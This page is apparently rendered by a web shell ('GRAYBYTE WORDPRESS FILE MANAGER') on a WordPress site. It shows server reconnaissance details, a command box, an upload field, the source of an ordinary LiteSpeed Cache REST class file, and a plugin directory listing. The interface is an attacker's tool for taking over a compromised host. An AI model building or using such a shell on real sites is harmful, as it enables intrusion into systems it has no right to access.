GRAYBYTE WORDPRESS FILE MANAGER7469

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/litespeed-cache/src/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/litespeed-cache/src//rest.cls.php
<?php

/**
 * The REST related class.
 *
 * @since       2.9.4
 */

namespace LiteSpeed;

defined('WPINC') || exit();

class REST extends Root {

	const LOG_TAG                  = '☎️';
	private $_internal_rest_status = false;

	/**
	 * Confructor of ESI
	 *
	 * @since    2.9.4
	 */
	public function __construct() {
		// Hook to internal REST call
		add_filter('rest_request_before_callbacks', array( $this, 'set_internal_rest_on' ));
		add_filter('rest_request_after_callbacks', array( $this, 'set_internal_rest_off' ));

		add_action('rest_api_init', array( $this, 'rest_api_init' ));
	}

	/**
	 * Register REST hooks
	 *
	 * @since  3.0
	 * @access public
	 */
	public function rest_api_init() {
		// Activate or deactivate a specific crawler callback
		register_rest_route('litespeed/v1', '/toggle_crawler_state', array(
			'methods' => 'POST',
			'callback' => array( $this, 'toggle_crawler_state' ),
			'permission_callback' => function () {
				return current_user_can('manage_network_options') || current_user_can('manage_options');
			},
		));

		register_rest_route('litespeed/v1', '/tool/check_ip', array(
			'methods' => 'GET',
			'callback' => array( $this, 'check_ip' ),
			'permission_callback' => function () {
				return current_user_can('manage_network_options') || current_user_can('manage_options');
			},
		));

		// IP callback validate
		register_rest_route('litespeed/v3', '/ip_validate', array(
			'methods' => 'POST',
			'callback' => array( $this, 'ip_validate' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		// 1.2. WP REST Dryrun Callback
		register_rest_route('litespeed/v3', '/wp_rest_echo', array(
			'methods' => 'POST',
			'callback' => array( $this, 'wp_rest_echo' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));
		register_rest_route('litespeed/v3', '/ping', array(
			'methods' => 'POST',
			'callback' => array( $this, 'ping' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		// CDN setup callback notification
		register_rest_route('litespeed/v3', '/cdn_status', array(
			'methods' => 'POST',
			'callback' => array( $this, 'cdn_status' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		// Image optm notify_img
		// Need validation
		register_rest_route('litespeed/v1', '/notify_img', array(
			'methods' => 'POST',
			'callback' => array( $this, 'notify_img' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		register_rest_route('litespeed/v1', '/notify_ccss', array(
			'methods' => 'POST',
			'callback' => array( $this, 'notify_ccss' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		register_rest_route('litespeed/v1', '/notify_ucss', array(
			'methods' => 'POST',
			'callback' => array( $this, 'notify_ucss' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		register_rest_route('litespeed/v1', '/notify_vpi', array(
			'methods' => 'POST',
			'callback' => array( $this, 'notify_vpi' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		register_rest_route('litespeed/v3', '/err_domains', array(
			'methods' => 'POST',
			'callback' => array( $this, 'err_domains' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));

		// Image optm check_img
		// Need validation
		register_rest_route('litespeed/v1', '/check_img', array(
			'methods' => 'POST',
			'callback' => array( $this, 'check_img' ),
			'permission_callback' => array( $this, 'is_from_cloud' ),
		));
	}

	/**
	 * Call to freeze or melt the crawler clicked
	 *
	 * @since  4.3
	 */
	public function toggle_crawler_state() {
		if (isset($_POST['crawler_id'])) {
			return $this->cls('Crawler')->toggle_activeness($_POST['crawler_id']) ? 1 : 0;
		}
	}

	/**
	 * Check if the request is from cloud nodes
	 *
	 * @since 4.2
	 * @since 4.4.7 As there is always token/api key validation, ip validation is redundant
	 */
	public function is_from_cloud() {
		// return true;
		return $this->cls('Cloud')->is_from_cloud();
	}

	/**
	 * Ping pong
	 *
	 * @since  3.0.4
	 */
	public function ping() {
		return $this->cls('Cloud')->ping();
	}

	/**
	 * Launch api call
	 *
	 * @since  3.0
	 */
	public function check_ip() {
		return Tool::cls()->check_ip();
	}

	/**
	 * Launch api call
	 *
	 * @since  3.0
	 */
	public function ip_validate() {
		return $this->cls('Cloud')->ip_validate();
	}

	/**
	 * Launch api call
	 *
	 * @since  3.0
	 */
	public function wp_rest_echo() {
		return $this->cls('Cloud')->wp_rest_echo();
	}

	/**
	 * Endpoint for QC to notify plugin of CDN status update.
	 *
	 * @since  7.0
	 */
	public function cdn_status() {
		return $this->cls('Cloud')->update_cdn_status();
	}

	/**
	 * Launch api call
	 *
	 * @since  3.0
	 */
	public function notify_img() {
		return Img_Optm::cls()->notify_img();
	}

	/**
	 * @since  7.1
	 */
	public function notify_ccss() {
		self::debug('notify_ccss');
		return CSS::cls()->notify();
	}

	/**
	 * @since  5.2
	 */
	public function notify_ucss() {
		self::debug('notify_ucss');
		return UCSS::cls()->notify();
	}

	/**
	 * @since  4.7
	 */
	public function notify_vpi() {
		self::debug('notify_vpi');
		return VPI::cls()->notify();
	}

	/**
	 * @since  4.7
	 */
	public function err_domains() {
		self::debug('err_domains');
		return $this->cls('Cloud')->rest_err_domains();
	}

	/**
	 * Launch api call
	 *
	 * @since  3.0
	 */
	public function check_img() {
		return Img_Optm::cls()->check_img();
	}

	/**
	 * Return error
	 *
	 * @since  5.7.0.1
	 */
	public static function err( $code ) {
		return array(
			'_res' => 'err',
			'_msg' => $code,
		);
	}

	/**
	 * Set internal REST tag to ON
	 *
	 * @since  2.9.4
	 * @access public
	 */
	public function set_internal_rest_on( $not_used = null ) {
		$this->_internal_rest_status = true;
		Debug2::debug2('[REST] ✅ Internal REST ON [filter] rest_request_before_callbacks');

		return $not_used;
	}

	/**
	 * Set internal REST tag to OFF
	 *
	 * @since  2.9.4
	 * @access public
	 */
	public function set_internal_rest_off( $not_used = null ) {
		$this->_internal_rest_status = false;
		Debug2::debug2('[REST] ❎ Internal REST OFF [filter] rest_request_after_callbacks');

		return $not_used;
	}

	/**
	 * Get internal REST tag
	 *
	 * @since  2.9.4
	 * @access public
	 */
	public function is_internal_rest() {
		return $this->_internal_rest_status;
	}

	/**
	 * Check if an URL or current page is REST req or not
	 *
	 * @since  2.9.3
	 * @since  2.9.4 Moved here from Utility, dropped static
	 * @access public
	 */
	public function is_rest( $url = false ) {
		// For WP 4.4.0- compatibility
		if (!function_exists('rest_get_url_prefix')) {
			return defined('REST_REQUEST') && REST_REQUEST;
		}

		$prefix = rest_get_url_prefix();

		// Case #1: After WP_REST_Request initialisation
		if (defined('REST_REQUEST') && REST_REQUEST) {
			return true;
		}

		// Case #2: Support "plain" permalink settings
		if (isset($_GET['rest_route']) && strpos(trim($_GET['rest_route'], '\\/'), $prefix, 0) === 0) {
			return true;
		}

		if (!$url) {
			return false;
		}

		// Case #3: URL Path begins with wp-json/ (REST prefix) Safe for subfolder installation
		$rest_url    = wp_parse_url(site_url($prefix));
		$current_url = wp_parse_url($url);
		// Debug2::debug( '[Util] is_rest check [base] ', $rest_url );
		// Debug2::debug( '[Util] is_rest check [curr] ', $current_url );
		// Debug2::debug( '[Util] is_rest check [curr2] ', wp_parse_url( add_query_arg( array( ) ) ) );
		if ($current_url !== false && !empty($current_url['path']) && $rest_url !== false && !empty($rest_url['path'])) {
			return strpos($current_url['path'], $rest_url['path']) === 0;
		}

		return false;
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
cdn
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
data_structure
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:29
giriqfky / giriqfky
0644
activation.cls.php
15.062 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
admin-display.cls.php
35.741 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
admin-settings.cls.php
10.949 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
admin.cls.php
4.467 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
api.cls.php
11.521 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
avatar.cls.php
6.12 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
base.cls.php
32.756 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
cdn.cls.php
13.223 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
cloud.cls.php
54.285 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
conf.cls.php
17.387 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
control.cls.php
21.249 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
core.cls.php
20.158 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
crawler-map.cls.php
14.891 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
crawler.cls.php
41.71 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
css.cls.php
15.251 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
data.cls.php
17.981 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
data.upgrade.func.php
23.384 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
db-optm.cls.php
10.157 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
debug2.cls.php
13.169 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
doc.cls.php
4.732 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
error.cls.php
7.487 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
esi.cls.php
27.166 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
file.cls.php
10.526 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
gui.cls.php
27.776 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
health.cls.php
2.901 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
htaccess.cls.php
24.13 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
img-optm.cls.php
65.273 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
import.cls.php
4.18 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
import.preset.cls.php
5.481 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
lang.cls.php
14.913 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
localization.cls.php
3.42 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
media.cls.php
33.177 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
metabox.cls.php
4.262 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
object-cache.cls.php
16.487 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
object.lib.php
34.132 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
optimize.cls.php
37.19 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
optimizer.cls.php
9.486 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
placeholder.cls.php
14.258 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
purge.cls.php
30.847 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
report.cls.php
6.189 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
rest.cls.php
7.519 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
root.cls.php
12.841 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
router.cls.php
19.943 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
str.cls.php
2.454 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
tag.cls.php
9.274 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
task.cls.php
6.136 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
tool.cls.php
3.409 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
ucss.cls.php
14.313 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
utility.cls.php
20.819 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
vary.cls.php
20.175 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644
vpi.cls.php
7.261 KB
June 18 2025 22:15:22
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF